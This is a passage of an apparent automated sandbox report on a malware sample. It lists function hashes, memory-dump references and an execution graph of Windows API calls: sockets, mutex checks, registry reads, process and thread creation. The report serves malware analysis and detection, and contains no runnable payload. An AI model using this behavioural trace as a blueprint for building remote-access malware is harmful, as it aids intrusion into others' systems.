                            • Opcode ID: 342f20b36f912233d5989e5519f30cdf0528356a4f7afb66c70c18a13d9ad2a2
                            • Instruction ID: 034cd8a671ab010f0136b18dd73c2a9d270bccbc9ce2493692d0490c45c76d22
                            • Opcode Fuzzy Hash: 342f20b36f912233d5989e5519f30cdf0528356a4f7afb66c70c18a13d9ad2a2
                            • Instruction Fuzzy Hash: 80019E71E0021E8FDB04EF68D8027AEBBB1EF48304F14456AD915E7390DB74A945CBC4
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4b13520046133a48a3dfe46cc960dbbdaad47efe15eef245798bca7e70df310d
                            • Instruction ID: 1ae7c0aeeee89824927da8c8a456eaed518e1789c7b76df5ee4332e0fa9a6f24
                            • Opcode Fuzzy Hash: 4b13520046133a48a3dfe46cc960dbbdaad47efe15eef245798bca7e70df310d
                            • Instruction Fuzzy Hash: 6601A23291060A9FCF10AEA4CC488D9BB75FF88315B01872AE10567210EB70A599CB90
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 724aada7361de2efcd39017248c7efd0e1d3edeeb07abefd5e5c250fd58ab9b6
                            • Instruction ID: 913418d0ce3b7862ce30dd68d58d64088aa26e52a941e139dcc662e9e393d960
                            • Opcode Fuzzy Hash: 724aada7361de2efcd39017248c7efd0e1d3edeeb07abefd5e5c250fd58ab9b6
                            • Instruction Fuzzy Hash: F2F03034B101108FC74497ACD888A7933DAEFC8A10B1840BAE60EDB360CEA0DC028BA0
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2c6ec0cddf748a5648519695b888ad6e58f8fba3bc2bab516a32e10cde34f2a6
                            • Instruction ID: 2ce7daccd35d7ca00cf003274eb8a07dea832d0e88c022df9d26d2971fedca2b
                            • Opcode Fuzzy Hash: 2c6ec0cddf748a5648519695b888ad6e58f8fba3bc2bab516a32e10cde34f2a6
                            • Instruction Fuzzy Hash: 41F082363002009BCB14AB69F809E56BFA5FBD5721B54C03EF649CB690DE31D805CBA0
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5e1b96e7cde6dbf465e48f7f01abac40689e0d083df567156c8b8cf8ed606713
                            • Instruction ID: fcad0fa3117c7f73e7a4c5b855fce2d0a4e788997767a220618d4346f244e6d5
                            • Opcode Fuzzy Hash: 5e1b96e7cde6dbf465e48f7f01abac40689e0d083df567156c8b8cf8ed606713
                            • Instruction Fuzzy Hash: 6DF020702093148FC326AF3888908623BB6EB5330134488EFE069CB762CA35EC49CB52
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c639251bed3e187e2446724a6b262eade1c570d28222de60f124cf4579acc71
                            • Instruction ID: 539ccd5021b704cf6cd3323310d18aab1849c37bbd471d717650b342a3361821
                            • Opcode Fuzzy Hash: 8c639251bed3e187e2446724a6b262eade1c570d28222de60f124cf4579acc71
                            • Instruction Fuzzy Hash: 68F0A0322082509FCB191A64B809D963FA2EBC532171A80ABF5458F2A2DE319D06CB91
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8fa185666c08069d754568c4b07f82870d0f5d7713624f88ab803bfd8a4038df
                            • Instruction ID: a065acf628c95574c081b7dd175d0c53633d7e54f3aff060af4bfbfe9298200f
                            • Opcode Fuzzy Hash: 8fa185666c08069d754568c4b07f82870d0f5d7713624f88ab803bfd8a4038df
                            • Instruction Fuzzy Hash: A4E06D71B007205B870CEBAEA40086AB7DBEED8614354C16AC50EC7724ED309C464AA0
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2652447dfcd4c3534e55356e9c7b58ba5901d9e772c173517ece18b2a2617764
                            • Instruction ID: 8e1d3ed66c09d340a2c6a9ef85e930f0cb0dc1d8a1ac320a42346b1d9c0c9b4c
                            • Opcode Fuzzy Hash: 2652447dfcd4c3534e55356e9c7b58ba5901d9e772c173517ece18b2a2617764
                            • Instruction Fuzzy Hash: EAE04F2355E3D20FEB228A2478936DA2B61FF62510B5A49CBE1D0CA0E7C84D694947A7
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf53d46c8e532d968192482c71010c66a1ac1a4d72573f806992d1a9b8db1203
                            • Instruction ID: 0544e1f63b950975795271de681dbe1b7474b5e9f54baea8cb412688ceb99cdd
                            • Opcode Fuzzy Hash: bf53d46c8e532d968192482c71010c66a1ac1a4d72573f806992d1a9b8db1203
                            • Instruction Fuzzy Hash: DFE09239A053A08FDB15E778E894BA93BA1EB42224B048197D004CB34ADE309C0B8BD1
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b5c2ccd1e169f02be8e38d24263e57569b5942bee35d1139a34d79a93293aa58
                            • Instruction ID: 064233389992c01296ac5b26212bfc149f114ef22c6580c5f77c15861362814b
                            • Opcode Fuzzy Hash: b5c2ccd1e169f02be8e38d24263e57569b5942bee35d1139a34d79a93293aa58
                            • Instruction Fuzzy Hash: D1E06D352052008FC359DF24D4A19617772EF0131931985EFC04A8BB62CA32E886CB14
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: acf7c6a4d7ffbd4372b1aa428eee112c5f99a4c38f58bf568b6d2af12389c274
                            • Instruction ID: 3ab9022cdacc51cc9bd811cdfd5b137ffd8c4d136fea6926580db710487f3cfa
                            • Opcode Fuzzy Hash: acf7c6a4d7ffbd4372b1aa428eee112c5f99a4c38f58bf568b6d2af12389c274
                            • Instruction Fuzzy Hash: 77F07F7A90061ACBCF10DF84D4416ACFB71FF95325F158296D6547B211D370AA9ACB80
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e9bbab7fea330348956e9bb9bc9149ebcf0ccabe19863080f4989be3ca7863e0
                            • Instruction ID: 62a3cff965fd1176c5eaca9eaa9a7dfa2dc304533802859bb30627520cc7d1fb
                            • Opcode Fuzzy Hash: e9bbab7fea330348956e9bb9bc9149ebcf0ccabe19863080f4989be3ca7863e0
                            • Instruction Fuzzy Hash: 24E04F7691465C9FCB41EF34CD599EA7BE4BF16310B00C5ABE94CCA011E638E689CB41
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4c9e18e67da01d3edd1fc33680653c27beecec47f51d5c04b760acd06928bded
                            • Instruction ID: 19ab28527482a8c6c226e23a8d0033bd984fdd4b00d0f027c221246e23c8a625
                            • Opcode Fuzzy Hash: 4c9e18e67da01d3edd1fc33680653c27beecec47f51d5c04b760acd06928bded
                            • Instruction Fuzzy Hash: F8E0C2B2B04B601FD31C9AA9E901867BB97EFD4600708C5AEC04DC7725E978AD46CFA4
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e80afe3384c5b593822189b15c8e439a4bc71fb0a437c672f9d37cd483e0af8e
                            • Instruction ID: 31dd43c47ecb3a4e889314abc4dded7a6bb49a310cb063d3c12497a29c86f333
                            • Opcode Fuzzy Hash: e80afe3384c5b593822189b15c8e439a4bc71fb0a437c672f9d37cd483e0af8e
                            • Instruction Fuzzy Hash: 97D05B3768511146D630D564BCC17DD2392FFD5201F598DD5E145D7184C85AA54E8351
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1088feb10b310fa605b821c58965f95dfb236e0375ecb0f135a34e8a5ee34fc6
                            • Instruction ID: 049104503c218c99ea084cbadb10ad8a31860442fa11407bf4112e2c30b122df
                            • Opcode Fuzzy Hash: 1088feb10b310fa605b821c58965f95dfb236e0375ecb0f135a34e8a5ee34fc6
                            • Instruction Fuzzy Hash: 2DE0C232588240BFC7029BA0DC058D2BFB9AF4631431CC0EBE048CB672D227E857D7A2
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1d4de549af4402f17000f17a87f2bb2c0b2fc21dd41e6e65cd25ec0f7f349414
                            • Instruction ID: ac87ed1a095e2dabd73b5e0e5d18fa59e2980452e79626db7a88966c331b17e3
                            • Opcode Fuzzy Hash: 1d4de549af4402f17000f17a87f2bb2c0b2fc21dd41e6e65cd25ec0f7f349414
                            • Instruction Fuzzy Hash: CFE0EC3181460C9D8B90EE74D9448A97BE8BB05211F40C56AE90D9A100EA34E298CB80
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4d8b3f223a79db80b4aa103d219e9800e62e9d4e210754ea857c2b03c88be6d5
                            • Instruction ID: d5f084af69890cf09c03f51e53400b7f40f23361a52898e9e9073b02bf74f405
                            • Opcode Fuzzy Hash: 4d8b3f223a79db80b4aa103d219e9800e62e9d4e210754ea857c2b03c88be6d5
                            • Instruction Fuzzy Hash: E7C012322000187B4B01AB85DC00C87BBADEF49654304C096E6088B131D622F91697D0

                            Execution Graph

                            Execution Coverage:1.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:3.6%
                            Total number of Nodes:643
                            Total number of Limit Nodes:13
                            execution_graph 45803 404e06 WaitForSingleObject 45804 404e20 SetEvent CloseHandle 45803->45804 45805 404e37 closesocket 45803->45805 45806 404eb8 45804->45806 45807 404e44 45805->45807 45808 404e5a 45807->45808 45816 4050c4 83 API calls 45807->45816 45809 404e6c WaitForSingleObject 45808->45809 45810 404eae SetEvent CloseHandle 45808->45810 45817 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45809->45817 45810->45806 45813 404e7b SetEvent WaitForSingleObject 45818 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45813->45818 45815 404e93 SetEvent CloseHandle CloseHandle 45815->45810 45816->45808 45817->45813 45818->45815 45819 40163e 45820 401646 45819->45820 45821 401649 45819->45821 45822 401688 45821->45822 45825 401676 45821->45825 45827 43229f 45822->45827 45824 40167c 45826 43229f new 22 API calls 45825->45826 45826->45824 45831 4322a4 45827->45831 45829 4322d0 45829->45824 45831->45829 45834 439adb 45831->45834 45841 440480 7 API calls 2 library calls 45831->45841 45842 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45831->45842 45843 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45831->45843 45839 443649 ___crtLCMapStringA 45834->45839 45835 443687 45845 43ad91 20 API calls _free 45835->45845 45836 443672 RtlAllocateHeap 45838 443685 45836->45838 45836->45839 45838->45831 45839->45835 45839->45836 45844 440480 7 API calls 2 library calls 45839->45844 45841->45831 45844->45839 45845->45838 45846 43263c 45847 432648 ___scrt_is_nonwritable_in_current_image 45846->45847 45872 43234b 45847->45872 45849 43264f 45851 432678 45849->45851 46136 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 45849->46136 45858 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 45851->45858 46137 441763 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 45851->46137 45853 432691 45855 432697 ___scrt_is_nonwritable_in_current_image 45853->45855 46138 441707 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 45853->46138 45856 432717 45883 4328c9 45856->45883 45858->45856 46139 4408e7 35 API calls 5 library calls 45858->46139 45867 432743 45869 43274c 45867->45869 46140 4408c2 28 API calls _Atexit 45867->46140 46141 4324c2 13 API calls 2 library calls 45869->46141 45873 432354 45872->45873 46142 4329da IsProcessorFeaturePresent 45873->46142 45875 432360 46143 436cd1 10 API calls 4 library calls 45875->46143 45877 432365 45882 432369 45877->45882 46144 4415bf 45877->46144 45879 432380 45879->45849 45882->45849 46210 434c30 45883->46210 45886 43271d 45887 4416b4 45886->45887 46212 44c239 45887->46212 45889 4416bd 45890 432726 45889->45890 46216 443d25 35 API calls 45889->46216 45892 40d3f0 45890->45892 46218 41a8da LoadLibraryA GetProcAddress 45892->46218 45894 40d40c 46225 40dd83 45894->46225 45896 40d415 46240 4020d6 45896->46240 45899 4020d6 28 API calls 45900 40d433 45899->45900 46246 419d87 45900->46246 45904 40d445 46272 401e6d 45904->46272 45906 40d44e 45907 40d461 45906->45907 45908 40d4b8 45906->45908 46278 40e609 45907->46278 45909 401e45 22 API calls 45908->45909 45911 40d4c6 45909->45911 45915 401e45 22 API calls 45911->45915 45914 40d47f 46293 40f98d 45914->46293 45916 40d4e5 45915->45916 46309 4052fe 45916->46309 45919 40d4f4 46314 408209 45919->46314 45928 40d4a3 45930 401fb8 11 API calls 45928->45930 45932 40d4ac 45930->45932 46131 4407f6 GetModuleHandleW 45932->46131 45933 401fb8 11 API calls 45934 40d520 45933->45934 45935 401e45 22 API calls 45934->45935 45936 40d529 45935->45936 46331 401fa0 45936->46331 45938 40d534 45939 401e45 22 API calls 45938->45939 45940 40d54f 45939->45940 45941 401e45 22 API calls 45940->45941 45942 40d569 45941->45942 45943 40d5cf 45942->45943 46335 40822a 28 API calls 45942->46335 45945 401e45 22 API calls 45943->45945 45950 40d5dc 45945->45950 45946 40d594 45947 401fc2 28 API calls 45946->45947 45948 40d5a0 45947->45948 45951 401fb8 11 API calls 45948->45951 45949 40d650 45955 40d660 CreateMutexA GetLastError 45949->45955 45950->45949 45952 401e45 22 API calls 45950->45952 45953 40d5a9 45951->45953 45954 40d5f5 45952->45954 46336 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45953->46336 45958 40d5fc OpenMutexA 45954->45958 45956 40d987 45955->45956 45957 40d67f 45955->45957 45961 401fb8 11 API calls 45956->45961 45999 40d9ec 45956->45999 45959 40d688 45957->45959 45960 40d68a GetModuleFileNameW 45957->45960 45963 40d622 45958->45963 45964 40d60f WaitForSingleObject CloseHandle 45958->45964 45959->45960 46339 4192ae 33 API calls 45960->46339 45985 40d99a ___scrt_get_show_window_mode 45961->45985 46337 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45963->46337 45964->45963 45966 40d5c5 45966->45943 45968 40dd0f 45966->45968 45967 40d6a0 45969 40d6f5 45967->45969 45971 401e45 22 API calls 45967->45971 46369 41239a 30 API calls 45968->46369 45973 401e45 22 API calls 45969->45973 45979 40d6bf 45971->45979 45981 40d720 45973->45981 45974 40dd22 46370 410eda 65 API calls ___scrt_get_show_window_mode 45974->46370 45976 40d63b 45976->45949 46338 41239a 30 API calls 45976->46338 45977 40dcfa 46007 40dd6a 45977->46007 46371 402073 28 API calls 45977->46371 45979->45969 45986 40d6f7 45979->45986 45993 40d6db 45979->45993 45980 40d731 45984 401e45 22 API calls 45980->45984 45981->45980 46343 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 45981->46343 45992 40d73a 45984->45992 46351 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 45985->46351 46341 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 45986->46341 45987 40dd3a 46372 4052dd 28 API calls 45987->46372 45998 401e45 22 API calls 45992->45998 45993->45969 46340 4067a0 36 API calls ___scrt_get_show_window_mode 45993->46340 45995 40d70d 45995->45969 46342 4066a6 58 API calls 45995->46342 46003 40d755 45998->46003 46004 401e45 22 API calls 45999->46004 46009 401e45 22 API calls 46003->46009 46006 40da10 46004->46006 46352 402073 28 API calls 46006->46352 46373 413980 161 API calls _strftime 46007->46373 46012 40d76f 46009->46012 46014 401e45 22 API calls 46012->46014 46013 40da22 46353 41215f 14 API calls 46013->46353 46016 40d789 46014->46016 46020 401e45 22 API calls 46016->46020 46017 40da38 46018 401e45 22 API calls 46017->46018 46019 40da44 46018->46019 46354 439867 39 API calls _strftime 46019->46354 46023 40d7a3 46020->46023 46022 40d810 46022->45985 46029 401e45 22 API calls 46022->46029 46062 40d89f ___scrt_get_show_window_mode 46022->46062 46023->46022 46025 401e45 22 API calls 46023->46025 46024 40da51 46026 40da7e 46024->46026 46355 41aa4f 81 API calls ___scrt_get_show_window_mode 46024->46355 46034 40d7b8 _wcslen 46025->46034 46356 402073 28 API calls 46026->46356 46032 40d831 46029->46032 46030 40da70 CreateThread 46030->46026 46611 41b212 10 API calls 46030->46611 46031 40da8d 46357 402073 28 API calls 46031->46357 46036 401e45 22 API calls 46032->46036 46034->46022 46040 401e45 22 API calls 46034->46040 46035 40da9c 46358 4194da 79 API calls 46035->46358 46038 40d843 46036->46038 46044 401e45 22 API calls 46038->46044 46039 40daa1 46041 401e45 22 API calls 46039->46041 46042 40d7d3 46040->46042 46043 40daad 46041->46043 46046 401e45 22 API calls 46042->46046 46048 401e45 22 API calls 46043->46048 46045 40d855 46044->46045 46050 401e45 22 API calls 46045->46050 46047 40d7e8 46046->46047 46344 40c5ed 31 API calls 46047->46344 46049 40dabf 46048->46049 46053 401e45 22 API calls 46049->46053 46052 40d87e 46050->46052 46058 401e45 22 API calls 46052->46058 46055 40dad5 46053->46055 46054 40d7fb 46345 401ef3 28 API calls 46054->46345 46061 401e45 22 API calls 46055->46061 46057 40d807 46346 401ee9 11 API calls 46057->46346 46060 40d88f 46058->46060 46347 40b871 46 API calls _wcslen 46060->46347 46063 40daf5 46061->46063 46348 412338 31 API calls 46062->46348 46359 439867 39 API calls _strftime 46063->46359 46066 40d942 ctype 46070 401e45 22 API calls 46066->46070 46068 40db02 46069 401e45 22 API calls 46068->46069 46071 40db0d 46069->46071 46072 40d959 46070->46072 46073 401e45 22 API calls 46071->46073 46072->45999 46075 401e45 22 API calls 46072->46075 46074 40db1e 46073->46074 46360 408f1f 166 API calls _wcslen 46074->46360 46076 40d976 46075->46076 46349 419bca 28 API calls 46076->46349 46079 40d982 46350 40de34 88 API calls 46079->46350 46080 40db33 46082 401e45 22 API calls 46080->46082 46084 40db3c 46082->46084 46083 40db83 46085 401e45 22 API calls 46083->46085 46084->46083 46086 43229f new 22 API calls 46084->46086 46091 40db91 46085->46091 46087 40db53 46086->46087 46088 401e45 22 API calls 46087->46088 46089 40db65 46088->46089 46094 40db6c CreateThread 46089->46094 46090 40dbd9 46093 401e45 22 API calls 46090->46093 46091->46090 46092 43229f new 22 API calls 46091->46092 46095 40dba5 46092->46095 46099 40dbe2 46093->46099 46094->46083 46609 417f6a 101 API calls 2 library calls 46094->46609 46096 401e45 22 API calls 46095->46096 46097 40dbb6 46096->46097 46102 40dbbd CreateThread 46097->46102 46098 40dc4c 46100 401e45 22 API calls 46098->46100 46099->46098 46101 401e45 22 API calls 46099->46101 46104 40dc55 46100->46104 46103 40dbfc 46101->46103 46102->46090 46606 417f6a 101 API calls 2 library calls 46102->46606 46106 401e45 22 API calls 46103->46106 46105 40dc99 46104->46105 46108 401e45 22 API calls 46104->46108 46366 4195f8 79 API calls 46105->46366 46109 40dc11 46106->46109 46111 40dc69 46108->46111 46361 40c5a1 31 API calls 46109->46361 46110 40dca2 46367 401ef3 28 API calls 46110->46367 46116 401e45 22 API calls 46111->46116 46113 40dcad 46368 401ee9 11 API calls 46113->46368 46119 40dc7e 46116->46119 46117 40dc24 46362 401ef3 28 API calls 46117->46362 46118 40dcb6 CreateThread 46123 40dce5 46118->46123 46124 40dcd9 CreateThread 46118->46124 46607 40e18d 122 API calls 46118->46607 46364 439867 39 API calls _strftime 46119->46364 46122 40dc30 46363 401ee9 11 API calls 46122->46363 46123->45977 46126 40dcee CreateThread 46123->46126 46124->46123 46608 410b5c 137 API calls 46124->46608 46126->45977 46610 411140 38 API calls ___scrt_get_show_window_mode 46126->46610 46128 40dc39 CreateThread 46128->46098 46605 401bc9 49 API calls _strftime 46128->46605 46129 40dc8b 46365 40b0a3 7 API calls 46129->46365 46132 432739 46131->46132 46132->45867 46133 44091f 46132->46133 46613 44069c 46133->46613 46136->45849 46137->45853 46138->45858 46139->45856 46140->45869 46141->45855 46142->45875 46143->45877 46148 44cd48 46144->46148 46147 436cfa 8 API calls 3 library calls 46147->45882 46151 44cd65 46148->46151 46152 44cd61 46148->46152 46150 432372 46150->45879 46150->46147 46151->46152 46154 4475a6 46151->46154 46166 432d4b 46152->46166 46155 4475b2 ___scrt_is_nonwritable_in_current_image 46154->46155 46173 442d9a EnterCriticalSection 46155->46173 46157 4475b9 46174 44d363 46157->46174 46159 4475c8 46165 4475d7 46159->46165 46185 44743a 23 API calls 46159->46185 46162 4475d2 46186 4474f0 GetStdHandle GetFileType 46162->46186 46163 4475e8 ___scrt_is_nonwritable_in_current_image 46163->46151 46187 4475f3 LeaveCriticalSection std::_Lockit::~_Lockit 46165->46187 46167 432d56 IsProcessorFeaturePresent 46166->46167 46168 432d54 46166->46168 46170 432d98 46167->46170 46168->46150 46209 432d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46170->46209 46172 432e7b 46172->46150 46173->46157 46175 44d36f ___scrt_is_nonwritable_in_current_image 46174->46175 46176 44d393 46175->46176 46177 44d37c 46175->46177 46188 442d9a EnterCriticalSection 46176->46188 46196 43ad91 20 API calls _free 46177->46196 46180 44d3cb 46197 44d3f2 LeaveCriticalSection std::_Lockit::~_Lockit 46180->46197 46181 44d39f 46181->46180 46189 44d2b4 46181->46189 46183 44d381 pre_c_initialization ___scrt_is_nonwritable_in_current_image 46183->46159 46185->46162 46186->46165 46187->46163 46188->46181 46198 443005 46189->46198 46191 44d2d3 46206 443c92 20 API calls _free 46191->46206 46193 44d2c6 46193->46191 46205 445fb3 11 API calls 2 library calls 46193->46205 46194 44d325 46194->46181 46196->46183 46197->46183 46203 443012 ___crtLCMapStringA 46198->46203 46199 443052 46208 43ad91 20 API calls _free 46199->46208 46200 44303d RtlAllocateHeap 46201 443050 46200->46201 46200->46203 46201->46193 46203->46199 46203->46200 46207 440480 7 API calls 2 library calls 46203->46207 46205->46193 46206->46194 46207->46203 46208->46201 46209->46172 46211 4328dc GetStartupInfoW 46210->46211 46211->45886 46213 44c24b 46212->46213 46214 44c242 46212->46214 46213->45889 46217 44c138 48 API calls 4 library calls 46214->46217 46216->45889 46217->46213 46219 41a919 LoadLibraryA GetProcAddress 46218->46219 46220 41a909 GetModuleHandleA GetProcAddress 46218->46220 46221 41a947 GetModuleHandleA GetProcAddress 46219->46221 46222 41a937 GetModuleHandleA GetProcAddress 46219->46222 46220->46219 46223 41a973 24 API calls 46221->46223 46224 41a95f GetModuleHandleA GetProcAddress 46221->46224 46222->46221 46223->45894 46224->46223 46374 419493 FindResourceA 46225->46374 46228 439adb _Yarn 21 API calls 46229 40ddad _Yarn 46228->46229 46377 402097 46229->46377 46232 401fc2 28 API calls 46233 40ddd3 46232->46233 46234 401fb8 11 API calls 46233->46234 46235 40dddc 46234->46235 46236 439adb _Yarn 21 API calls 46235->46236 46237 40dded _Yarn 46236->46237 46383 4062ee 46237->46383 46239 40de20 46239->45896 46241 4020ec 46240->46241 46242 4023ae 11 API calls 46241->46242 46243 402106 46242->46243 46244 402549 28 API calls 46243->46244 46245 402114 46244->46245 46245->45899 46435 4020bf 46246->46435 46248 401fb8 11 API calls 46249 419e3c 46248->46249 46250 401fb8 11 API calls 46249->46250 46252 419e44 46250->46252 46251 419e0c 46441 404182 28 API calls 46251->46441 46255 401fb8 11 API calls 46252->46255 46257 40d43c 46255->46257 46256 419e18 46258 401fc2 28 API calls 46256->46258 46268 40e563 46257->46268 46260 419e21 46258->46260 46259 401fc2 28 API calls 46266 419d9a 46259->46266 46261 401fb8 11 API calls 46260->46261 46263 419e29 46261->46263 46262 401fb8 11 API calls 46262->46266 46442 41ab9a 28 API calls 46263->46442 46266->46251 46266->46259 46266->46262 46267 419e0a 46266->46267 46439 404182 28 API calls 46266->46439 46440 41ab9a 28 API calls 46266->46440 46267->46248 46269 40e56f 46268->46269 46271 40e576 46268->46271 46443 402143 11 API calls 46269->46443 46271->45904 46273 402143 46272->46273 46274 40217f 46273->46274 46444 402710 11 API calls 46273->46444 46274->45906 46276 402164 46445 4026f2 11 API calls std::_Deallocate 46276->46445 46279 40e624 46278->46279 46446 40f57c 46279->46446 46285 40e663 46286 40d473 46285->46286 46462 40f663 46285->46462 46288 401e45 46286->46288 46289 401e4d 46288->46289 46291 401e55 46289->46291 46557 402138 22 API calls 46289->46557 46291->45914 46295 40f997 __EH_prolog 46293->46295 46558 40fcfb 46295->46558 46296 40f663 36 API calls 46297 40fb90 46296->46297 46562 40fce0 46297->46562 46299 40d491 46301 40e5ba 46299->46301 46300 40fa1a 46300->46296 46568 40f4c6 46301->46568 46304 40d49a 46306 40dd70 46304->46306 46305 40f663 36 API calls 46305->46304 46578 40e5da 70 API calls 46306->46578 46308 40dd7b 46310 4020bf 11 API calls 46309->46310 46311 40530a 46310->46311 46579 403280 46311->46579 46313 405326 46313->45919 46583 4051cf 46314->46583 46316 408217 46587 402035 46316->46587 46319 401fc2 46320 401fd1 46319->46320 46327 402019 46319->46327 46321 4023ae 11 API calls 46320->46321 46322 401fda 46321->46322 46323 40201c 46322->46323 46324 401ff5 46322->46324 46325 40265a 11 API calls 46323->46325 46602 403078 28 API calls 46324->46602 46325->46327 46328 401fb8 46327->46328 46329 4023ae 11 API calls 46328->46329 46330 401fc1 46329->46330 46330->45933 46332 401fb2 46331->46332 46333 401fa9 46331->46333 46332->45938 46603 4025c0 28 API calls 46333->46603 46335->45946 46336->45966 46337->45976 46338->45949 46339->45967 46340->45969 46341->45995 46342->45969 46343->45980 46344->46054 46345->46057 46346->46022 46347->46062 46348->46066 46349->46079 46350->45956 46351->45999 46352->46013 46353->46017 46354->46024 46355->46030 46356->46031 46357->46035 